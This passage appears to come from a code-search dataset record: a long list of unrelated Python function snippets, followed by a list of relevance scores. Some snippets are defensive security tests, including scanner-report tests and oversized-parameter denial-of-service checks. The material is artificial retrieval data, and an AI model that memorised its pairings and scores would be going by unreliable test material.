print \"not enough,\", most_expensive, \"removed\"\n print\n else:\n print most_expensive, \"chosen\"\n print \"STRATEGY PART END\"\n print\n return most_expensive", "def check_for_exposed(context):\n json_data = context.response.json()\n if \"exploitable_vulnerabilities_count\" in json_data:\n raise Exception(\"Field exploitable_vulnerabilities_count Exposed in\"\n \" Free user result\")\n if \"vendor_package_link\" in json_data:\n raise Exception(\"Field vendor_package_link has been exposed for free user\")", "def hits(self) :\n\t\ttry :\n\t\t\treturn self._hits\n\t\texcept Exception as e:\n\t\t\traise e", "def how_many_entries(URL):\n\treturn len(get_lottery_numbers(URL))", "def stats(self):\n return super(NoneCache, self).stats()", "def get_request_candidates(self):\n return os.listdir(self.cache_dir_)", "def get_popular_tickets_solution(tickets):\n popular_tickets = []\n for ticket in tickets:\n num_watchers = len(ticket['people']['watchers'])\n if num_watchers >= 8:\n popular_tickets.append(ticket)\n return popular_tickets", "def get_popular_tickets(tickets):\n popular_tickets = []\n #\n # TODO - your code here\n # \n for ticket in tickets:\n str_len=len(ticket['people']['watchers'])\n if str_len>=8:\n popular_tickets.append(ticket)\n \n return popular_tickets", "def get_requests(url, user, passwd):\n \n #get\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n \n #if timout\n if r.status_code == 403:\n print(\"LIMIT EXCEEDED\")\n print(\"WAIT AN HOUR\")\n i=1\n while r.status_code != 200:\n time.sleep(60)\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n print(\"{} MINUTES ELAPSED\".format(i))\n i+=1\n elif r.status_code != 200:\n print(r.status_code)\n return []\n #return data\n data = r.json()\n return data", "async def get_aces_used(user_id):\n aces_used = ex.first_result(await ex.conn.fetchrow(\"SELECT acesused FROM blackjack.currentstatus WHERE userid = $1\", user_id))\n if aces_used is None:\n return []\n return aces_used.split(',')", "def get_leverables(self):\n import re\n\n \"\"\"\n Gets all groups (leverables) from nexus\n :return: list\n \"\"\"\n if self.url == 'test':\n leverabellist = ['asu', 'bll', 'tfp']\n else:\n leverabellist = []\n try:\n response = urlopen('http://' + self.url + '/nexus/content/repositories/rpm-dev/fk/rpm/')\n except (HTTPError, URLError) as e:\n logger.error(e)\n return ['Error getting leverables!!!']\n\n for rline in response:\n line = rline.decode(\"utf-8\")\n if re.match(\".*<td>(.*)/repositories/(.*)\", line):\n leverabellist.append(line.split('\">')[-1].split('/')[0])\n\n return leverabellist", "def undefhits(self) :\n\t\ttry :\n\t\t\treturn self._undefhits\n\t\texcept Exception as e:\n\t\t\traise e", "def retrieve_closed_issues(self):\n return self._retrieve_issues(\"closed\")", "def request_more_resources():\n logger.info(\"NEED MORE RESOURCES!!!!\")", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def list(self):\n path = 
\"authSettings/exemptedUrls\"\n return self._session.get(path)", "def get_possible_exploit(self):\n return 'exploit', self.exploit.run()", "def expenses(self):\n\n return Expenses.objects.filter(\n house=self.house,\n )", "def get_all(self):\r\n ret = []\r\n for cache_name, stat in self.stats_per_cache.items():\r\n ret.append({\r\n 'cache_name': cache_name,\r\n 'num_hits': len(stat.hit_targets),\r\n 'num_misses': len(stat.miss_targets),\r\n 'hits': stat.hit_targets,\r\n 'misses': stat.miss_targets\r\n })\r\n return ret", "def getDailyAvailableRequests(self):\n return self._dailyAvailableRequests", "def test_get_urls(self):\r\n OFFER_URLS = [\"http://olx.pl/offer1\",\r\n \"http://olx.pl/offer2\",\r\n \"http://olx.pl/offer3\",\r\n \"http://olx.pl/offer4\",\r\n \"http://olx.pl/offer5\",\r\n \"http://olx.pl/offer6\"]\r\n\r\n SEARCH_QUERY = \"http://SEARCH_QUERY_URL?\"\r\n \r\n for url in OfferSearcher.search(SEARCH_QUERY, 6, WebDocumentFetcherStub):\r\n self.assertTrue(url in OFFER_URLS, \"Unexpected offer url fetched: %s\" % url)\r\n OFFER_URLS.remove(url)\r\n \r\n self.assertEquals(0, len(OFFER_URLS), \"Not all offer urls fetched: %s\" % OFFER_URLS)", "def test_obtain_issues(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='High')]\n\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n\n self.assertIsInstance(issues, List)\n self.assertIsInstance(issues[0], Checkmarx.Issue)\n self.assertEqual('JScript Vulnerabilities', issues[0].group)\n self.assertEqual('Reflected XSS', issues[0].title)\n self.assertEqual('http://url/CxWebClient/ScanQueryDescription.aspx?queryID=789&'\n 'queryVersionCode=842956&queryTitle=Reflected_XSS', issues[0].display_url)\n self.assertEqual(1, issues[0].count)\n self.assertEqual(\"Recurrent\", issues[0].status)", "def provides(self):\n provides = set()\n if self._retry is not None:\n provides.update(self._retry.provides)\n for item in self:\n provides.update(item.provides)\n return frozenset(provides)", "def extract_listings(page_url, attempts=10):\r\n \r\n listings_max = 0\r\n listings_out = [BeautifulSoup('', features='html.parser')]\r\n for idx in range(attempts):\r\n try:\r\n answer = requests.get(page_url, timeout=5)\r\n content = answer.content\r\n soup = BeautifulSoup(content, features='html.parser')\r\n listings = soup.findAll(\"div\", {\"class\": \"_gig1e7\"})\r\n except:\r\n # if no response - return a list with an empty soup\r\n listings = [BeautifulSoup('', features='html.parser')]\r\n\r\n if len(listings) == 20:\r\n listings_out = listings\r\n break\r\n\r\n if len(listings) >= listings_max:\r\n listings_max = len(listings)\r\n listings_out = listings\r\n\r\n return listings_out", "def get_free_games(self) -> List[Game]:", "def get_incomplete_exp_summaries(user_id):\n incomplete_exploration_ids = get_all_incomplete_exp_ids(user_id)\n\n number_deleted = 0\n for exploration_id in incomplete_exploration_ids:\n if not exp_services.does_exploration_exists(exploration_id):\n number_deleted = number_deleted + 1\n remove_exp_from_incomplete_list(user_id, exploration_id)\n\n return exp_services.get_exploration_summaries_matching_ids(\n incomplete_exploration_ids), number_deleted", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in 
used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def _get_personal_popular_resources_uris(self,\n num_entries: int,\n user_id: str,\n resource_type: ResourceType = ResourceType.Table) -> List[str]:\n LOGGER.info('Querying personal popular resources URIs')\n\n num_readers = app.config['POPULAR_RESOURCES_MINIMUM_READER_COUNT']\n\n relation_model = resource_relation_model[resource_type][UserResourceRel.read]\n res_key = f'{resource_type.name.lower()}_rk'\n res_attr = getattr(relation_model, res_key)\n user_attr = getattr(relation_model, 'user_rk')\n read_count_attr = getattr(relation_model, 'read_count')\n\n with self.client.create_session() as session:\n readers = func.count(user_attr).label('readers')\n\n usage_subquery = session.query(\n res_attr.label('res_key'),\n readers,\n func.sum(read_count_attr).label('total_reads')\n ).filter(\n user_attr == user_id\n ).group_by(res_attr).having(readers >= num_readers).subquery()\n\n popular_usage = session.query(usage_subquery.c.res_key).order_by(\n (usage_subquery.c.readers * func.log(usage_subquery.c.total_reads)).desc()\n ).limit(num_entries).all()\n\n return [usage.res_key for usage in popular_usage]", "def available_healpix_pixels(self):\n return [dataset.info['healpix_pixel'] for dataset in self._datasets]", "def get_app_queue_last_unused_offers(\n app_queue_item: Optional[MarathonQueueItem],\n) -> Sequence[Dict]:\n if app_queue_item is None:\n return []\n return app_queue_item.last_unused_offers", "def get_all_stats():\n\n return get_component(CachingPackage.COMPONENT_NAME).get_all_stats()", "def get_available_images():\n return AVAILABLE_IMAGES", "def sitetotalresponses(self) :\n\t\ttry :\n\t\t\treturn self._sitetotalresponses\n\t\texcept Exception as e:\n\t\t\traise e", "def get(self) -> city_processor.CityOverheadTimes:\n with self._access_queue_lock:\n overhead_times = self._data_queue[0]\n del self._data_queue[0]\n print(\"element removed from the queue! 
Queue has %d elements left\" % len(self._data_queue))\n return overhead_times", "def checkRls():\n return api.rate_limit_status()['resources']['search']['/search/tweets']['remaining']", "def get_metric_list(config):\n metric_list = []\n url = config[\"OPENTSDB_URL\"] + \"/api/suggest?type=metrics&q=\"\n response = requests.get(url)\n if response.status_code == 200:\n metric_list = response.json()\n logger.debug(\"Get metric list from opentsdb: \" + str(metric_list))\n return metric_list", "def get_requests(self):\r\n\t\tself.last_processed = self.last_modified\r\n\t\treturn self.requests", "def get_kong_node_usage_metrics(opts):\n\n url = \"{0}/status\".format(opts['base_url'])\n\n r = requests.get(url)\n try:\n r.raise_for_status()\n except requests.exceptions.RequestException as e:\n logging.debug(\"http response body - %s\", r.text)\n logging.error(\"An exception occurred: (%s)\", e)\n sys.exit(2)\n\n print r.text\n\n return True", "async def get_ff_emotes():\n\n redis = await aioredis.create_redis_pool(REDIS)\n value = await redis.hgetall(\"ff_emotes\", encoding=\"utf-8\")\n\n redis.close()\n await redis.wait_closed()\n return value;", "def getEnergyConsumers(self):\n return self._EnergyConsumers", "def test_obtain_issues_exclude_false_positives(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=True, severity='High')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def test_dos_list_service_huge_limit(self):\n # create a huge list of domain\n attack_string = \"1\" * 3500\n params = {\"limit\": attack_string, \"marker\": attack_string}\n resp = self.client.list_services(param=params)\n self.assertTrue(resp.status_code < 503)", "def get_techniques_used_by_malware():\n global techniques_used_by_malware\n \n if not techniques_used_by_malware:\n techniques_used_by_malware = rsh.techniques_used_by_malware(get_srcs())\n \n return techniques_used_by_malware", "def fetch_friendships(friendships, apis, users, excluded, out, target,\n save_frequency=15,\n friends_restricted_to=None,\n friendships_file=\"cache/friendships.json\") -> None:\n friendships.update(get_or_set(out / target / friendships_file, friendships))\n friends_restricted_to = friends_restricted_to if friends_restricted_to else users\n users_ids = set([str(user[\"id\"]) for user in friends_restricted_to])\n excluded = [s.lower() for s in get_or_set(excluded, [])]\n api_idx = 0\n for i, user in enumerate(users):\n if user[\"screen_name\"].lower() in excluded:\n continue\n if str(user[\"id\"]) in friendships:\n print(f\"[{len(friendships)}] @{user['screen_name']} found in cache.\")\n else:\n print(f\"[{len(friendships)}] Fetching friends of @{user['screen_name']}\")\n user_friends = []\n previous_cursor, next_cursor = 0, -1\n while previous_cursor != next_cursor and next_cursor != 0:\n try:\n new_user_friends, (previous_cursor, next_cursor) = apis[api_idx].get_friend_ids(user_id=user[\"id\"],\n stringify_ids=True,\n cursor=next_cursor)\n user_friends += new_user_friends\n except tweepy.TooManyRequests as e:\n api_idx = (api_idx + 1) % len(apis)\n print(f\"You reached the rate limit. Moving to next api: #{api_idx}\")\n sleep(15)\n except tweepy.TweepyException as e:\n print(f\"failed at api: #{api_idx}\")\n print(\"...but it failed. 
Error: {}\".format(e))\n user_friends = []\n break\n except (requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout) as e:\n print(e) # Why do I get these?\n sleep(5)\n\n common_friends = set(user_friends).intersection(users_ids)\n friendships[str(user[\"id\"])] = list(common_friends)\n # Write to file\n if i % save_frequency == 0:\n get_or_set(out / target / friendships_file, friendships.copy(), force=True)\n get_or_set(out / target / friendships_file, friendships.copy(), force=True)", "def get_etags(self,etagkey,headers):\n m = Memcache_Wrapper()\n\n etags_value = ['0']\n client_lastmodedate = \"\"\n\n hash_etagkey = etagkey+\"_etags\"\n hash_etagsvalue = m.get(hash_etagkey) # value from the cache\n\n last_mod_date_key = etagkey + \"_lastmoddate\"\n lastmoddate_value = m.get(last_mod_date_key) # value from the cache for lastmoddate\n\n # value from the header\n if 'If-None-Match' in headers:\n etags_value = [x.strip('\" ') for x in headers['If-None-Match'].split(',')]\n if 'If-Modified-Since' in headers:\n client_lastmodedate = str(datetime.datetime.strptime(headers['If-Modified-Since'],HTTP_DATE_FMT))\n if etags_value[0] == hash_etagsvalue and client_lastmodedate == lastmoddate_value:\n return True\n else:\n return False", "def likely_regressions(self):\n return set([label for label, count in self.regressions.items() if count == 0])", "def num_cached(self):\n return len(self._item_list)", "def _CheckExpirations(file_objs):\n expired = []\n unexpired = []\n for file_obj in file_objs:\n if _IsExpired(file_obj):\n expired.append(file_obj)\n else:\n unexpired.append(file_obj)\n return expired, unexpired", "def GetAllDifferentAmountOfCost():\n\n logs.logger.debug(\n \"Start to get back all different amount of \"\n \"Cost objects from database.\")\n try:\n ListOfAllDifferentAmountOfCost = []\n searchedCostsItems = GetAllAmountOfCost()\n for item in searchedCostsItems:\n if item not in ListOfAllDifferentAmountOfCost:\n ListOfAllDifferentAmountOfCost.append(item)\n logs.logger.info(\n \"Get back all different amount of Cost objects from database.\")\n return ListOfAllDifferentAmountOfCost\n except Exception as e:\n logs.logger.error(e, exc_info=True)", "def summarize(url: str, check_rate_limit: bool = True) -> Dict[str, Any]:\n try:\n split_url = urlsplit(url)\n if 'github.com' in split_url.hostname:\n return github_issue(url, check_rate_limit)\n elif 'stackoverflow.com' in split_url.hostname:\n return stackoverflow_question(url, check_rate_limit)\n except Exception:\n pass\n\n return {}", "def get_leds_used(self)->List[str]:\n leds = list()\n for group in self.LedGroups:\n leds.extend(group.Leds)\n return [str(led) for led in leds]", "def usage_metrics(self) -> Sequence['outputs.GetServiceQuotaUsageMetricResult']:\n return pulumi.get(self, \"usage_metrics\")", "def mymetrics(): \n _update_metric_counters()\n logging.debug(prom_objects_seen.collect())\n return flask.Response(generate_latest(), mimetype='text/plain')", "def get_devices_used_by(employee_id: int) -> list:\n\n conn = database_connect()\n if(conn is None):\n return None\n cur = conn.cursor()\n\n try:\n # SQL statement and execute\n sql = \"\"\"SELECT D.deviceID, D.manufacturer, D.modelNumber\n FROM Device D JOIN DeviceUsedBy DUB USING(deviceID) JOIN Employee E USING(empID)\n WHERE E.empid = %s\"\"\"\n cur.execute(sql, (employee_id,));\n\n # Attempt to fetch first row\n result = cur.fetchall()\n\n if result == None:\n cur.close()\n conn.close()\n return []\n\n device_usedby = []\n for row in result:\n 
device_usedby.append(\n [row[0], row[1], row[2]]\n )\n return device_usedby\n\n except Exception as e:\n # If something went wrong, return an empty list\n print(\"ccc\")\n print(e)\n cur.close()\n conn.close()\n return []", "def gc_requests(self):\r\n\t\tnow = time.time()\r\n\t\tif (now - self.last_gc) > self.gc_interval: \r\n\t\t\tprint('now: {0}'.format(now))\r\n\t\t\tfor req in self.requests:\r\n\t\t\t\tprint('req.timestamp: {0}'.format(req.timestamp))\r\n\t\t\t\tprint('diff: {0}'.format(now - req.timestamp))\r\n\t\t\tlive = [req for req in self.requests if (now - req.timestamp) < self.max_request_refresh_interval]\r\n\t\t\tdead = [req for req in self.requests if (now - req.timestamp) >= self.max_request_refresh_interval]\r\n\r\n\t\t\tif len(dead):\r\n\t\t\t\tself.requests = live\r\n\t\t\t\tself.last_modified = now\r\n\r\n\t\t\tself.last_gc = time.time()", "def test_efficiency(self):\n effs = self.gr.calculate_global_efficiencies()\n ans = [a/6 for a in [1.5, 2., 1.5]]\n self.assertListEqual(effs.values(), ans)\n\n E = self.gr.global_efficiency()\n self.assertEqual(E, sum(ans))\n\n v_min = (E - (1/3)) / E\n mx, v = self.gr.vulnerability()\n # the middle node (2) is the most vulnerable\n self.assertEqual(mx, (2, v_min))", "def get_requests(self):\n\t\tself.last_processed = self.last_modified\n\t\treturn self.requests", "def get_scans_list(server_url, exp_no, return_list=False):\n if server_url.endswith('/') is False:\n server_url = '%s/' % server_url\n data_dir_url = '%sexp%d/Datafiles' % (server_url, exp_no)\n\n does_exist, raw_lines = check_url(data_dir_url, read_lines=True)\n if does_exist is False:\n return \"Experiment %d's URL %s cannot be found.\" % (exp_no, data_dir_url)\n\n # Scan through the index page\n scan_list = []\n header = 'HB3A_exp%04d_scan' % exp_no\n for line in raw_lines:\n if line.count(header) > 0:\n # try to find file HB3A_exp0123_scan6789.dat\n term = line.split(header)[1].split('.dat')[0]\n scan = int(term)\n # check\n if '%04d' % scan == term:\n scan_list.append(scan)\n # END_FOR\n scan_list = sorted(scan_list)\n if return_list is True:\n return scan_list\n\n message = 'Experiment %d: Scan from %d to %d' % (exp_no, scan_list[0], scan_list[-1])\n\n return message", "def get_total_weak_hosts(self):\n return len(self.weak_hosts)", "def get_leaks(self):\n _run_garbage_collection()\n\n remaining_objects = self._get_all_tracked_objects()\n remaining_objects = self._remove_initial_objects_from_list(remaining_objects)\n\n return remaining_objects", "def test_dos_list_service_huge_junk(self):\n # create a huge list of domain\n attack_string = \"1\" * 3500\n params = {\"junk\": attack_string}\n resp = self.client.list_services(param=params)\n self.assertTrue(resp.status_code < 503)", "def _not_exhausted(last_fetched):\n return len(last_fetched) == 100", "def retrieve_cached_decisions(self):\r\n return u.load_cached_data(self.decisions_cache_path)", "def get_free(self):\r\n\t\treturn len(self.free_objects)", "async def workers_to_close(self, target: int) -> list:\n # TODO, improve me with something that thinks about current load\n return list(self.observed)[target:]", "def gc_requests(self):\n\t\tnow = time.time()\n\t\tif (now - self.last_gc) > self.gc_interval: \n\t\t\tprint('now: {0}'.format(now))\n\t\t\tfor req in self.requests:\n\t\t\t\tprint('req.timestamp: {0}'.format(req.timestamp))\n\t\t\t\tprint('diff: {0}'.format(now - req.timestamp))\n\t\t\tlive = [req for req in self.requests if (now - req.timestamp) < self.max_request_refresh_interval]\n\t\t\tdead = [req for 
req in self.requests if (now - req.timestamp) >= self.max_request_refresh_interval]\n\n\t\t\tif len(dead):\n\t\t\t\tself.requests = live\n\t\t\t\tself.last_modified = now\n\n\t\t\tself.last_gc = time.time()", "def list_uses(self):\n return list(set(self._prop_typology['USE'].values))", "def get_last_used_features(self) -> Set[str]:\n return self.stats[next(reversed(OrderedDict(self.stats)))]['best_performer']['Labels']", "def list_metrics(self):\n pass", "def test_amount_of_listings_many_listings(self):\n listings = steam_market.get_total_amount_of_listings(soup=get_soup_from_path(TEST_FILE_MANY_RESULTS))\n self.assertEqual(164720, listings)", "def test_get_consumed_with_empty_result(self, m):\n url = \"https://www.cellartracker.com/xlquery.asp?User=test-username&Password=test-password&Table=Consumed&Format=tab&Location=1\"\n file = open(\"./tests/fixtures/consumed_empty.tsv\", \"r\")\n m.register_uri(\"GET\", url, status_code=200, text=file.read())\n file.close\n\n cellartracker = CellarTracker(username=\"test-username\", password=\"test-password\")\n data = cellartracker.get_consumed()\n self.assertEqual([], data)", "def _get_gs_energies(self):\n energy = []\n for ground_state in self._ground_states:\n gs_energy = 0.0\n for key in ground_state[\"eci\"].keys():\n gs_energy += ground_state[\"eci\"][key] * ground_state[\"cf\"][key]\n energy.append(len(ground_state[\"atoms\"]) * gs_energy)\n return energy", "def get(self):\n if path.exists(self.cachefile):\n self.invalidion()\n full_cache = self._get_all()\n return full_cache\n else:\n return []" ]
[ "0.7264244", "0.6198452", "0.6186663", "0.59214425", "0.5807355", "0.5651149", "0.56107587", "0.5609498", "0.5529075", "0.5527514", "0.5387147", "0.5349075", "0.52784765", "0.52772737", "0.5273169", "0.5267631", "0.52531534", "0.52378064", "0.52269423", "0.5195598", "0.5152756", "0.5101667", "0.5036905", "0.50301784", "0.4966456", "0.49473494", "0.4895537", "0.48755294", "0.48739398", "0.48575675", "0.4854634", "0.48538315", "0.48427555", "0.48370898", "0.483337", "0.48169672", "0.4811255", "0.4809194", "0.48060906", "0.48021448", "0.47917765", "0.47900212", "0.4780996", "0.47794893", "0.47779965", "0.47766495", "0.47616673", "0.47598553", "0.47570527", "0.4743615", "0.47382724", "0.47339815", "0.4733592", "0.47178137", "0.47141096", "0.4685792", "0.46746832", "0.46711075", "0.4670698", "0.46682346", "0.46661833", "0.46607476", "0.46537694", "0.4646758", "0.46461916", "0.4645883", "0.46430144", "0.46283853", "0.46259853", "0.46251675", "0.46214047", "0.4619092", "0.46186686", "0.46167803", "0.4615743", "0.46079677", "0.46056914", "0.4603387", "0.459509", "0.45924872", "0.45911595", "0.45908293", "0.4589278", "0.4585864", "0.45851335", "0.45830148", "0.4579217", "0.4578508", "0.45783457", "0.4577442", "0.45710373", "0.45552218", "0.45529523", "0.45524603", "0.45517337", "0.45458898", "0.45421264", "0.45399997", "0.45285818", "0.45281065" ]
0.7800213
0
fetcher.get_unused_explores() should return all unused explores.
def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores):
    unused_explores = fc.get_unused_explores(model=test_model["name"])
    assert all(e in test_unused_explores for e in unused_explores)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def exploits(self):\n return self.rpc.call(MsfRpcMethod.ModuleExploits)['modules']", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def summarize_unused_offers(app_queue: Optional[MarathonQueueItem]) -> Dict[str, int]:\n unused_offers = get_app_queue_last_unused_offers(app_queue)\n reasons: Dict[str, int] = defaultdict(lambda: 0)\n for offer in unused_offers:\n for reason in offer[\"reason\"]:\n reasons[reason] += 1\n return reasons", "def unused_evals(self):\n\t\treturn self.Evals - self.nFES", "def getExpired(self, idle=365):\n cutOff = datetime.datetime.now() - datetime.timedelta(days=idle)\n return [x for x in self.xeps if x.status == \"Experimental\" and x.date < cutOff]", "def test_obtain_issues_exclude_false_positives(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=True, severity='High')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_exploits():\n results = {}\n for loader, name, ispkg in pkgutil.walk_packages(acsploit.exploits.__path__):\n m = loader.find_module(name).load_module(name)\n\n if not ispkg and hasattr(m, 'options') and hasattr(m, 'run'):\n exploit = name.replace('.', '/')\n results[exploit] = m\n\n return results", "def get_unassigned_tags(**kwargs):\n return Tags.get_unassigned_tags(**kwargs)", "def retrieve_closed_issues(self):\n return self._retrieve_issues(\"closed\")", "def undefhits(self) :\n\t\ttry :\n\t\t\treturn self._undefhits\n\t\texcept Exception as e:\n\t\t\traise e", "def get_expenses(self, parameter=None):\n resp = zoho_http_client.get(base_url, self.details, self.headers, parameter)\n return parser.get_list(resp)", "def test_obtain_issues_exclude_wrong_severity(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='Low')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_incomplete_exp_summaries(user_id):\n incomplete_exploration_ids = get_all_incomplete_exp_ids(user_id)\n\n number_deleted = 0\n for exploration_id in incomplete_exploration_ids:\n if not exp_services.does_exploration_exists(exploration_id):\n number_deleted = number_deleted + 1\n remove_exp_from_incomplete_list(user_id, exploration_id)\n\n return exp_services.get_exploration_summaries_matching_ids(\n incomplete_exploration_ids), number_deleted", "def get_unhealthy_instances(self):\n unhealthy = []\n for instance in self.instances.itervalues():\n 
if instance.state == InstanceState.RUNNING_FAILED:\n unhealthy.append(instance)\n continue # health report from epuagent (or absence of it) is irrelevant\n\n if instance.health not in _HEALTHY_STATES:\n\n # only allow the zombie state for instances that are\n # terminated\n if (instance.state < InstanceState.TERMINATED or\n instance.health == InstanceHealthState.ZOMBIE):\n unhealthy.append(instance)\n\n return unhealthy", "def check_for_exposed(context):\n json_data = context.response.json()\n if \"exploitable_vulnerabilities_count\" in json_data:\n raise Exception(\"Field exploitable_vulnerabilities_count Exposed in\"\n \" Free user result\")\n if \"vendor_package_link\" in json_data:\n raise Exception(\"Field vendor_package_link has been exposed for free user\")", "def test_obtain_issues_no_query(self, mock_url_read):\n mock_url_read.side_effect = \\\n [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}', '<CxXMLResults />']\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def _CheckExpirations(file_objs):\n expired = []\n unexpired = []\n for file_obj in file_objs:\n if _IsExpired(file_obj):\n expired.append(file_obj)\n else:\n unexpired.append(file_obj)\n return expired, unexpired", "def get_app_queue_last_unused_offers(\n app_queue_item: Optional[MarathonQueueItem],\n) -> Sequence[Dict]:\n if app_queue_item is None:\n return []\n return app_queue_item.last_unused_offers", "def _get_remaining(self):\n remaining = []\n for game_info in self.steam_keys:\n if game_info[1] not in self.steam_keys_given:\n remaining.append(game_info[0])\n return remaining", "def explores(self, explores):\n\n self._explores = explores", "def get_expired_nscache():\n now = int(time())\n keys_to_del = []\n for key, odict in nscache.iteritems():\n for dn, ce in odict.iteritems():\n if ce._expiration - now <= 0:\n keys_to_del.append((key, dn))\n return (keys_to_del, nscache)", "def list_unresolved(self): # new\n feed = self.get_feed(limit=999999)\n posts = feed.get(\"threads\")\n\n for s in posts:\n if (\n s.get(\"approved_status\", \"approved\") != \"rejected\"\n and (\n s.get(\"type\", \"question\") != \"post\" or s.get(\"is_megathread\", True)\n )\n and not s.get(\"is_answered\", True)\n and s.get(\"unresolved_count\", 1)\n ):\n yield s", "def forget(self, request):\n return []", "def forget(self, request):\n return []", "def get_low_use_instances(self):\n response = self.support.describe_trusted_advisor_check_result(checkId=LOW_USE_CHECK_ID, language='en')\n if 'result' in response:\n return response['result'].get('flaggedResources', [])", "def missing_data_amounts():\n\n return [2]", "def get_leverables(self):\n import re\n\n \"\"\"\n Gets all groups (leverables) from nexus\n :return: list\n \"\"\"\n if self.url == 'test':\n leverabellist = ['asu', 'bll', 'tfp']\n else:\n leverabellist = []\n try:\n response = urlopen('http://' + self.url + '/nexus/content/repositories/rpm-dev/fk/rpm/')\n except (HTTPError, URLError) as e:\n logger.error(e)\n return ['Error getting leverables!!!']\n\n for rline in response:\n line = rline.decode(\"utf-8\")\n if re.match(\".*<td>(.*)/repositories/(.*)\", line):\n leverabellist.append(line.split('\">')[-1].split('/')[0])\n\n return leverabellist", "def get_healthy_instances(self):\n return [instance for instance in self.instances.itervalues()\n if instance.health in _HEALTHY_STATES and\n instance.state < InstanceState.RUNNING_FAILED]", "def 
_filter_return_errors_list(self, url, har=None):\r\n if not har:\r\n har = self.har\r\n \r\n matches = []\r\n for entry in har[\"log\"][\"entries\"]:\r\n temp = entry[\"request\"][\"url\"].encode('ascii', 'ignore')\r\n if url in entry[\"request\"][\"url\"] and temp not in matches and entry[\"response\"][\"status\"] >= 400:\r\n print \"\\nRequest failed w/ \" + str(entry[\"response\"][\"status\"]) + \" error:\\n\" + entry[\"request\"][\"url\"]\r\n if entry[\"response\"][\"content\"].get(\"text\"):\r\n print \"RESPONSE: \" + str(entry[\"response\"][\"content\"][\"text\"].encode('ascii', 'ignore'))\r\n temp = entry[\"request\"][\"url\"].encode('ascii', 'ignore')\r\n matches.append([temp,entry[\"response\"][\"content\"].get(\"text\",\"\")])\r\n return matches", "def remove_unreachable_urls(list_of_urls):\n list_of_reachable_url = []\n for url in list_of_urls:\n try:\n f = requests.get(url)\n print('\\t',url, 'status_code:', f.status_code)\n list_of_reachable_url.append(url)\n except:\n print('\\t',url, 'not reachable -- > removed')\n\n return list_of_reachable_url", "def get_stale_assigned_tasks():\n\n # select t.id from tasks t, actions a where\n # a.task_id = t.id and t.currentaction = 'assigned'\n # group by t.id having now() - max(a.timestamp) < interval '1 day';\n return db.session.query(Task).filter_by(\n currentaction='assigned').join(Task.actions).group_by(\n Task.id).having(max(Action.timestamp) > stale_threshold).all()", "def list_missing_for_deposit(self, needs: Tuple) -> List[int]:\n missing = []\n for item in needs:\n if not any(self.needed_keywords_list(item)):\n missing.append(item)\n return missing", "def test_dos_list_service_huge_junk(self):\n # create a huge list of domain\n attack_string = \"1\" * 3500\n params = {\"junk\": attack_string}\n resp = self.client.list_services(param=params)\n self.assertTrue(resp.status_code < 503)", "def cpu_halt_reasons(self):\n buf_size = self.MAX_NUM_MOES\n buf = (structs.JLinkMOEInfo * buf_size)()\n num_reasons = self._dll.JLINKARM_GetMOEs(buf, buf_size)\n if num_reasons < 0:\n raise errors.JLinkException(num_reasons)\n\n return list(buf)[:num_reasons]", "def getRpmBlacklist():\n global index\n enabledRpms = set()\n for stream in enabledStreams.values():\n enabledRpms = enabledRpms.union(stream.get_rpm_artifacts())\n\n allRpms = set()\n for name in index.get_module_names():\n module = index.get_module(name)\n for stream in module.get_all_streams():\n allRpms = 